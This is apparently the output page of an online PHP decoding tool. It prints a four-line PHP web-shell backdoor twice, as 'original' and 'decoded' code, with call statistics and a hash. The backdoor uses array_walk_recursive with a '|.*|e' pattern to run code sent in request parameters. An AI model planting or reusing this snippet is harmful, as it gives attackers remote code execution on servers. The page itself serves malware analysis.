Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $e = $_REQUEST['e']; $arr = array($_POST['pass'] => '|.*|e',); array_walk_recursive(..
Decoded Output download
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
?>
Did this file decode correctly?
Original Code
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
?>
Function Calls
| array_walk_recursive | 1 |
Stats
| MD5 | 418d403c12d7af7e83ab169b8fe4e054 |
| Eval Count | 0 |
| Decode Time | 101 ms |